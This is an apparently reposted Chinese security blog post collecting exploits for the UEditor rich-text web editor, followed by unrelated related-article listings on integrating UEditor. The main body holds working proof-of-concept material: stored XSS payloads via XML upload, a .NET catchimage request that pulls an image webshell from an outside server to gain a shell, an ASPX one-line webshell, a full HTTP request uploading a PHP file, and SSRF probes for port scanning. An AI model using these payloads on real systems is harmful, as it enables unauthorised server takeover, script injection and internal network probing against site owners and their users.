UEditor 富文本web编辑器

最新推荐文章于 2024-03-11 22:19:01 发布
最新推荐文章于 2024-03-11 22:19:01 发布
阅读量879 收藏
点赞数
分类专栏: web 文章标签: 安全 web安全 服务器
原文链接:https://www.cnblogs.com/dslt/p/14903092.html
版权

大神论坛 UEditor 富文本web编辑器最新漏洞版XML文件上传导致存储型XSS

https://www.cnblogs.com/dslt/p/14903092.html

一、Ueditor最新版XML文件上传导致存储型XSS
测试版本:php版 v1.4.3.3
下载地址:https://github.com/fex-team/ueditor 复现步骤:

  1. 上传一个图片文件

  2. 然后buprsuit抓包拦截

3.将uploadimage类型改为uploadfile,并修改文件后缀名为xml,最后复制上xml代码即可

  1. 即可弹出xss

请注意http://controller.xxx的访问路径
http://192.168.10.1/ueditor1433/php/controller.php?action=listfile

常见的xml弹窗POC:
弹窗xss:

alert(1); URL跳转: window.location.href="https://www.t00ls.net/"; 远程加载Js: 常用的上传路径: /ueditor/index.html /ueditor/asp/controller.asp?action=uploadimage /ueditor/asp/controller.asp?action=uploadfile /ueditor/net/controller.ashx?action=uploadimage /ueditor/net/controller.ashx?action=uploadfile /ueditor/php/controller.php?action=uploadfile /ueditor/php/controller.php?action=uploadimage /ueditor/jsp/controller.jsp?action=uploadfile /ueditor/jsp/controller.jsp?action=uploadimage 常用列出获取路径: /ueditor/net/controller.ashx?action=listfile /ueditor/net/controller.ashx?action=listimage 二、文件上传漏洞 1. NET版本文件上传 该任意文件上传漏洞存在于1.4.3.3、1.5.0和1.3.6版本中,并且只有.NET版本受该漏洞影响。黑客可以利用该漏洞上传木马文件,执行命令控制服务器。

ueditor中已经下架.net版本,但历史版本中可以下载1.4.3版本,但是否是1.4.3.3目前还没验证。

该漏洞是由于上传文件时,使用的CrawlerHandler类未对文件类型进行检验,导致了任意文件上传。1.4.3.3和1.5.0版本利用方式稍有不同,1.4.3.3需要一个能正确解析的域名。而1.5.0用IP和普通域名都可以。相对来说1.5.0版本更加容易触发此漏洞;而在1.4.3.3版本中攻击者需要提供一个正常的域名地址就可以绕过判断;
(1)ueditor . http://1.5.0.net 版本
首先1.5.0版本进行测试,需要先在外网服务器上传一个图片木马,比如:1.jpg/1.gif/1.png 都可以,下面x.x.x.x是外网服务器地址,source[]参数值改为图片木马地址,并在结尾加上“?.aspx”即可getshell,利用POC:
POST /ueditor/net/controller.ashx?action=catchimage
source%5B%5D=http%3A%2F%2Fx.x.x.x/1.gif?.aspx

(2) ueditor.1.4.3.3 .net版

  1. 本地构造一个html,因为不是上传漏洞所以enctype 不需要指定为multipart/form-data, 之前见到有poc指定了这个值。完整的poc如下”

shell addr:

  1. 需准备一个图片马儿,远程shell地址需要指定扩展名为 1.gif?.aspx 1.gif图片木马(一句话木马:密码:hello)如下:
    GIF89a

<%popup(popup(System.Text.Encoding.GetEncoding(65001). GetString(System.Convert.FromBase64String(“UmVxdWVzdC5JdGVtWyJoZWxsbyJd”)))); %>
其中 UmVxdWVzdC5JdGVtWyJoZWxsbyJd的base64值为:Request.Item[“hello”]

成功后,会返回马儿地址。
(3) ueditor.1.3.6 .net1版本

使用%00截断的方式上传绕过

三、PHP版本的文件上传
利用poc:
POST http://localhost/ueditor/php/action_upload.php? action=uploadimage&CONFIG[imagePathFormat]=ueditor/php/upload/fuck&CONFIG[i mageMaxSize]=9999999&CONFIG[imageAllowFiles] []=.php&CONFIG[imageFieldName]=fuck HTTP/1.1
Host: localhost Connection: keep-alive Content-Length: 222 Cache-Control: max-age=0 Origin: null
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36
Content-Type: multipart/form-data; boundary=—— WebKitFormBoundaryDMmqvK6b3ncX4xxA
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
———WebKitFormBoundaryDMmqvK6b3ncX4xxA
Content-Disposition: form-data; name=“fuck”; filename=“fuck.php” Content-Type: application/octet-stream

<?php phpinfo();?>

———WebKitFormBoundaryDMmqvK6b3ncX4xxA—
shell路径由CONFIG[imagePathFormat]=ueditor/php/upload/fuck决定[http://localhost/ueditor/php/upload/fuck.php
四、SSRF漏洞
该漏洞存在于1.4.3的jsp版本中。但1.4.3.1版本已经修复了该漏洞。

SSRF
已知该版本ueditor的ssrf触发点:

/jsp/controller.jsp?action=catchimage&source[]=
/jsp/getRemoteImage.jsp?upfile=
/php/controller.php?action=catchimage&source[]=
使 用 百 度 logo 构 造 poc:
这里可以根据页面返回的结果不同,来判断该地址对应的主机端口是否开放。可以总结为以下几点:
如 果 抓 取 不 存 在 的 图 片 地 址 时 , 页 面 返 回 {“state”: “SUCCESS”, list: [{“state”:"\u8fdc\u7a0b\u8fde\u63a5\u51fa\u9519"} ]},即state为“远程连接出错”。
如 果 成 功 抓 取 到 图 片 , 页 面 返 回 {“state”: “SUCCESS”, list: [{“state”: “SUCCESS”,“size”:“5103”,“source”:“http://192.168.135.133:8080/tomcat.png”,“title”: “1527173588127099881.png”,
“url”:"/ueditor/jsp/upload/image/20180524/1527173588127099881.png"}
]},即state为“SUCCESS”。
如 果 主 机 无 法 访 问 , 页 面 返 回 {“state”:“SUCCESS”, list: [{“state”: “\u6293\u53d6\u8fdc\u7a0b\u56fe\u7247\u5931\u8d25”}]}, 即state为“ 抓取远程图片失败”。

还有一个版本的ssrf漏洞 ,存在于onethink 1.0中的ueditor,测试版本为1.2直接贴Poc
POST http://target/Public/static/ueditor/php/getRemoteImage.php HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded Content-Length: 37
Connection: keep-alive
upfile=https://www.google.com/?%23.jpg

五、另一处XSS漏洞
首先安装部署环境:https://github.com/fex-team/ueditor/releases/tag/v1.4.3.3
存储型XSS需要写入后端数据库,这里要把编辑器部署到一个可与数据库交互的环境中。

首先我们打开编辑器输入正常的文本:

抓包并将
标签以及原本的文本删除:

插入payload:

%3Cp%3E1111111">%3Cbr%2F%3E%3C%2Fp%3E

成功触发存储型XSS漏洞

明月清风~~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php如何接入UEditor富文本编辑器
03-23
php接入UEditor富文本编辑器 部分代码展现 /** * 获取文件完整路径 * @return string */ private function getFilePath() { $fullname = $this->fullName; $rootPath = $_SERVER['DOCUMENT_ROOT'].'/FRONT_SITE/web'; // $rootPath = $_SERVER['DOCUMENT_ROOT']; if (substr($fullname, 0, 1) != '/') { $fullname = '/' . $fullname; } return $rootPath . $fullname; }
关于富文本编辑器UEditor(java版)的使用,以及如何将UEditor的文件/图片上传路径改成绝对路径...
weixin_34221773的博客
09-29 586
突然发现好久没写博客了,感觉变懒了,是要让自己养成经常写文章的习惯才行。既可以分享自己的所学,和所想,和大家一起讨论,发现自己的不足的问题。 大家可能经常会用到富文本编辑器,今天我要说的是UEditor的使用,这是一个简单易用的开源富文本编辑器。但是对于没有用过的同学而言还是需要稍微了解一下的。 可能有些人也知道,UEditor是百度的开源富文本编辑器,...
富文本编辑器UEditor
最新发布
2301_79659699的博客
03-11 498
富文本编辑器的使用
UEditor富文本编辑器
09-10
一款功能强大并且内容丰富的在线文本编辑器,只使用简单的javascript就可以调用起来
ueditor-dev-1.5.0富文本编辑(已编译)
06-15
UEditor是由百度web前端研发部开发所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点,开源基于MIT协议,允许自由使用和修改代码。
ueditor富文本编辑器
08-07
UEditor是由百度web前端研发部开发所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点,开源基于MIT协议,允许自由使用和修改代码。
springboot集成ueditor,自定义后台接口,使用七牛云
xinkailei3的博客
02-15 1138
ueditor为什么无法在springboot中使用 官方提供的Java后端接口是 ueditor/jsp/controller.jspjsp在springboot中存在一些问题,导致ueditor不能正确使用。 1、spingboot的视图可能不使用jsp 2、spingboot项目发布为jar包时,获取不到/ueditor/jsp/config.json文件。 解决思路 这时我们就要自定义...
UEditorJSP版)使用总结
zhaoxueerHY的博客
02-02 2112
1.背景  公司一个后台模块要用到插入表格的功能,之前项目中使用的是 Umeditor,UEditor 的迷你版,然后悲催地发现 umeditor 中并没有插入表格的功能,好吧,只能换插件了。因为对百度富文本的风格较为熟悉,所以果断换完整版的 UEditor 了。于是开始了貌似短暂却充满艰辛的 ueditor 探(tong)索(ku)之路。 2.引入 Editor 插件 (1
官网下载UEditor文件没有ueditor.all.js、ueditor.all.min.js文件
一如既往的博客
12-23 2738
ueditor-dev-1.5.0,jsp版本是没有jsp文件的。 ueditor-dev-1.4.3,是有jsp文件的, 其他的版本没有测试过。 今天我在UEditor官网下载,发现下载下来的文件中没有ueditor.all.js、ueditor.all.min.js文件 让后我在回到GitHud官网看到了 进入命令窗口后执行 npm install 命令,如下图执行成功,标记那一块不用管不会对你下面的操作有影响的 在执行 grunt 命令,提示没有此命令,需要执行 npm install -g gr
富文本编辑器UEdtion(JSP版本)
从程序到业务的心路历程
02-07 541
百度UEDtion—JSP版本使用教程官网:http://fex.baidu.com/ueditor/#server-jsp JSP 使用说明 1 背景 UEditor 1.4.0 版本对之前的配置方式进行了简化,具体请参见:后端请求规范,为了适应这次升级,JAVA 后台也进行了重写,跟之前的版本差别较大,升级的用户注意阅读本文档。 本文档介绍 UEditor JAVA
富文本编辑器 ueditor
01-16
UEditor是由百度web前端研发部开发所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点,开源基于MIT协议,允许自由使用和修改代码...
UEditor 富文本 web 编辑器
11-23
UEditor 是由百度「FEX前端研发团队」开发的所见即所得富文本 web 编辑器,具有轻量,可定制,注重用户体验等特点,开源基于MIT协议,允许自由使用和修改代码
springboot 整合 ueditor 并实现文件上传(自定义上传路径)
weixin_42132143的博客
12-31 1899
1.先去官网下载 ueditor 的源码http://ueditor.baidu.com/website/download.html 我们是java的springboot整合的,所以我们直接下载jsp版本的 在springboot的resources目录下的satic下新建文件夹 ueditor,然后把刚下载压缩包解压进该目录 接下来我们修改根目录下 ueditor.config....
百度富文本编辑器ueditor/jsp版的简单使用,可上传图片和附件
weixin_30718391的博客
06-04 477
~~经过一上午的时间,终于把ueditor编辑器搞出来了,仅做记录 #完成的样子 1,首先在官网下载对应的插件 【附下载地址:http://ueditor.baidu.com/website/download.html】 本人使用的是Java语言,框架是ssm+maven 2,解压文件,在自己项目的根目录下新建文件夹 ueditor,把utf8-jsp中文件复制粘贴到ued...
ueditor上传图片回调_springboot+mybatis+oss整合ueditor
weixin_39747595的博客
11-27 197
今天项目的管理后台需要用到编辑器,之前有用到一款编辑器,叫做wangEditor,这款编辑器虽然接入是很快,给我的感觉就是傻白甜,但是他的编辑器的功能是比较少,后面又将编辑器改成了百度的ueditor,这块编辑器功能比较齐全(个人感觉),但是在接入的时候遇到了许多坑,看了官网的例子,但接入的过程还是有点坎坷,所以在此记录一下;下载路径:http://ueditor.baidu.com/websit...
[J2EE]jsp项目中使用UEditor富文本编辑器
热门推荐
1.02^365=1377.41
08-11 2万+
Ueditor简介 安装配置 配置图片上传路径
百度编辑器Ueditor上传控件相关问题解决
Otaku love travel
07-30 768
1、问题原因: 由于百度编辑器相关jar包里面的class文件在某些特殊的情况下无法完全引入,或者映入过后无法读取config.json的配置文件导致上传的相关配置不正确。 2、解决办法: 修改ueditor.config.js的配置读取的控制器层接口地址(注:该地址用于返回上传的相关配置josn和上传文件) 控制器代码示例.(注,自己根据自己需要的配置或者上传文件保存...
ueditor编辑器任意文件上传
课嗨教育的专栏
04-02 575
事情起源于项目,本身我并没有关注过ueditor方面,遇到一个网站也是纯属尝试下,但是居然搞定了。 那就从官方下载代码来看下额 下载地址:http://ueditor.baidu.com/website/download.html#ueditor POST /utf8-php/php/controller.php?action=uploadimage HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64.
jsp 引用配置 ueditor富文本编辑器
09-08
要在JSP中引用配置UEditor富文本编辑器,需要进行以下步骤: 1. 下载UEditor:在UEditor官网上下载最新的UEditor压缩包,解压到项目的Web目录下。 2. 创建JSP页面:创建一个JSP页面,比如命名为editor.jsp。 3. 引入UEditor相关文件:在editor.jsp页面中,引入UEditor所需的CSS和JS文件。例如: ```html <link href="/ueditor/themes/default/css/ueditor.css" rel="stylesheet"> <script src="/ueditor/ueditor.config.js"></script> <script src="/ueditor/ueditor.all.js"></script> ``` 确保引入的路径与实际的文件路径相匹配。 4. 创建富文本编辑器实例:在页面的body内部,创建一个textarea元素作为编辑器的容器,并使用JavaScript代码初始化UEditor实例。例如: ```html <body> <textarea id="myEditor" name="content"></textarea> <script type="text/javascript"> var editor = UE.getEditor('myEditor'); </script> </body> ``` 这样就完成了在JSP中引用配置UEditor富文本编辑器的过程。你可以根据官方文档进一步配置UEditor的功能和样式。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值